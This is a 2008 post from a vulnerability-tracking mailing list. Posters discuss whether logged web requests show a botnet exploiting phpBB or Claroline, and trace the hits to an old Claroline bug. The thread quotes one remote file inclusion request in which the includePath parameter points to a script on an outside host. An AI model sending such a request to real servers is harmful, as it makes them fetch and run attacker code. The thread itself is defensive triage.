[VIM] RFI BotNet and phpBB 0-day?

security curmudgeon jericho at attrition.org
Thu Mar 20 19:34:26 UTC 2008

: Dunno if it's a botnet but given Gadi's paper from last year on web 
: server compromises, it's a really good theory.

I say that based on a few things i've seen, and I bet a real analysis 
would very quickly prove or disprove the theory.

: > > /claroline/phpbb/page_tail.php?includePath=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt%3f%3f
: I looked at the 2.0.23 source.
: Using phpBB2 code: page_tail.php is in includes/ - so I wouldn't expect a
: /claroline/phpbb/page_tail.php to work.  So, this is probably Claroline.

Well, don't base it just on that path. I see a LOT of obvious path request 


I see these a hundred times a day and obviously will not work. So seeing 
/claroline/ in front of the /phpbb/ request was odd, but I didn't take it 
to mean it was necessarily claroline, even though it may be.

:   ./claroline155/claroline/phpbb/page_tail.php
: But - no apparent luck:
:   @include(dirname(__FILE__)."/../inc/claro_init_footer.inc.php");
: and no mention of includePath in that file.
: claro_init_footer.inc.php seems clean.
: Similar for 1.64.
: However - $includePath is used all over the place in Claroline, and
: apparently uses an unset(), so maybe there's a relationship with an unset
: bug.
: 1.42 ZIP file seems corrupted, so I couldn't check it out.

>From George:

Looks like an issue in Claroline 1.5.x fixed with the release of 1.5.5 
back in 2006:


More information about the VIM mailing list